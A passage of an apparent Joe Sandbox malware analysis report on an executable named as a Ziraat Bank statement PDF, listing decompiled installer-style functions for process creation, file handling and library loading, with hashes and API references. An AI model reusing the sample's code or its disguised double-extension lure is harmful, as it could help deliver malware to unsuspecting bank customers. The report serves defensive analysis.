                                                  0x00403437
                                                  0x00000000
                                                  0x00403423
                                                  0x00000000
                                                  0x004033f0
                                                  0x004033e5
                                                  0x004033e0
                                                  0x004033d7
                                                  0x004033be
                                                  0x00403473
                                                  0x00403476

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                  • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                  • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                  • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 69%
                                                  			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                                                  0x0040138a
                                                  0x004013fa
                                                  0x0040139b
                                                  0x004013a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004013a2
                                                  0x004013a3
                                                  0x004013ad
                                                  0x00000000
                                                  0x00401404
                                                  0x004013b0
                                                  0x004013b7
                                                  0x004013bd
                                                  0x004013be
                                                  0x004013c0
                                                  0x004013c2
                                                  0x004013b9
                                                  0x004013b9
                                                  0x004013ba
                                                  0x004013ba
                                                  0x004013c9
                                                  0x004013cb
                                                  0x004013f4
                                                  0x004013f4
                                                  0x004013c9
                                                  0x00000000

                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                  • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                                                  • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                                                  • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                  0x00405c54
                                                  0x00405c74
                                                  0x00405c7c
                                                  0x00405c81
                                                  0x00000000
                                                  0x00405c87
                                                  0x00405c8b

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3712363035-0
                                                  • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                  • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                                                  • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                                  • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                  0x00406a3d
                                                  0x00406a40
                                                  0x00406a47
                                                  0x00406a4f
                                                  0x00406a5b
                                                  0x00000000
                                                  0x00406a62
                                                  0x00406a52
                                                  0x00406a59
                                                  0x00000000
                                                  0x00406a6a
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                    • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                    • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                                                    • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                  • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                                                  • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                                                  • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                  0x0040615c
                                                  0x00406169
                                                  0x0040617e
                                                  0x00406184

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                  • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                  • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                  • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                                                  0x00406138
                                                  0x0040613e
                                                  0x00406143
                                                  0x0040614c
                                                  0x0040614c
                                                  0x00406155

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                  • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                  • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                  • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                  • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                  0x00405c1c
                                                  0x00405c24
                                                  0x00000000
                                                  0x00405c2a
                                                  0x00000000

                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                  • GetLastError.KERNEL32 ref: 00405C2A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                  • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                  • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                  • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                  0x0040620e
                                                  0x0040621e
                                                  0x00406226
                                                  0x00000000
                                                  0x0040622d
                                                  0x00000000
                                                  0x0040622f

                                                  APIs
                                                  • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0040CEF0,00403579,0040CEF0,?,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                  • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                  • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                  • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                  0x004061df
                                                  0x004061ef
                                                  0x004061f7
                                                  0x00000000
                                                  0x004061fe
                                                  0x00000000
                                                  0x00406200

                                                  APIs
                                                  • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                  • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                  • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                  • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                  0x00403606
                                                  0x0040360c

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                  • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                  • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                  • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                  0x00401faa
                                                  0x00401faf
                                                  0x00401fb5
                                                  0x00401fba
                                                  0x00401fbe
                                                  0x0040292e
                                                  0x00401fc4
                                                  0x00401fc7
                                                  0x00401fca
                                                  0x00401fd2
                                                  0x00401fe1
                                                  0x00401fe3
                                                  0x00401fe3
                                                  0x00401fd4
                                                  0x00401fd8
                                                  0x00401fd8
                                                  0x00401fd2
                                                  0x00401fea
                                                  0x00401feb
                                                  0x00401feb
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                    • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                    • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                    • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                    • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                    • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                    • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                    • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                    • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                    • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
